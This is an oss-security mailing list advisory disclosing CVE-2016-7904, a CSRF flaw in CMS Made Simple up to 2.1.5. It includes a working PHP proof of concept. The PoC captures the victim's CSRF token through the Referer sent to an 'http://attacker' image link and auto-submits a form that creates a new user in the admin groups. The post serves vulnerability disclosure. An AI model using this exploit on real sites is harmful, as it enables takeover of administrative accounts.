Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 16 Jan 2017 10:17:29 +0800 (GMT+08:00)
From: "Hongkun Zeng" <hongkun.zeng@...ppsecurity.com.cn>
To: oss-security <oss-security@...ts.openwall.com>
Subject: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF

Vulnerability: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF
CVE: CVE-2016-7904
Discovered by: Hongkun Zeng (http://www.dbappsecurity.com.cn/)


CMS Made Simple (CMSMS) is a free, open source (GPL) content management system (CMS) to provide developers, programmers and site owners a web-based development and administration area.


This is a security issue in CMSMS. Low privilege users were able to gain control of an administrative session through a CSRF attack.


Add article and insert image with link http://attacker/csrfpoc.php, and the referer would leak the users' csrf token.


POC:
```
//File: csrfpoc.php
<?php
session_start();


if(!isset($_SERVER['HTTP_REFERER']) && !isset($_SESSION['_sk_']))
exit;


if(isset($_SERVER['HTTP_REFERER'])){
$parsed_url = parse_url($_SERVER['HTTP_REFERER']);
$query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : '';
parse_str("$query",$arr);
if(isset($arr['_sk_'])){
$_SESSION['_sk_'] = $arr['_sk_'];
}
}
if(!isset($_SESSION['_sk_']))
exit;
?>


<form action='http://localhost:8012/admin/adduser.php' method='POST' id='form' enctype='multipart/form-data'>
<input type="text" name="_sk_" value="<?php echo $_SESSION['_sk_'];?>" />
<input type="text" name="user" value="test" />
<input type="text" name="password" value="123456" />
<input type="text" name="passwordagain" value="123456" />
<input type="text" name="firstname" value="" />
<input type="text" name="lastname" value="" />
<input type="text" name="email" value="" />
<input type="text" name="active" value="1" />
<input type="text" name="sel_groups[]" value="1" />
<input type="text" name="sel_groups[]" value="2" />
<input type="text" name="sel_groups[]" value="3" />
<input type="text" name="copyusersettings" value="-1" />
<input type="text" name="submit" value="submit" />
</form>
<script> document.createElement('form').submit.call(document.getElementById('form')); </script> 
```


Ref:
http://dev.cmsmadesimple.org/project/changelog/5392


--

Best Regards,
Hongkun Zeng
---------------------------------------------------
hongkun.zeng (at) dbappsecurity.com.cn

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ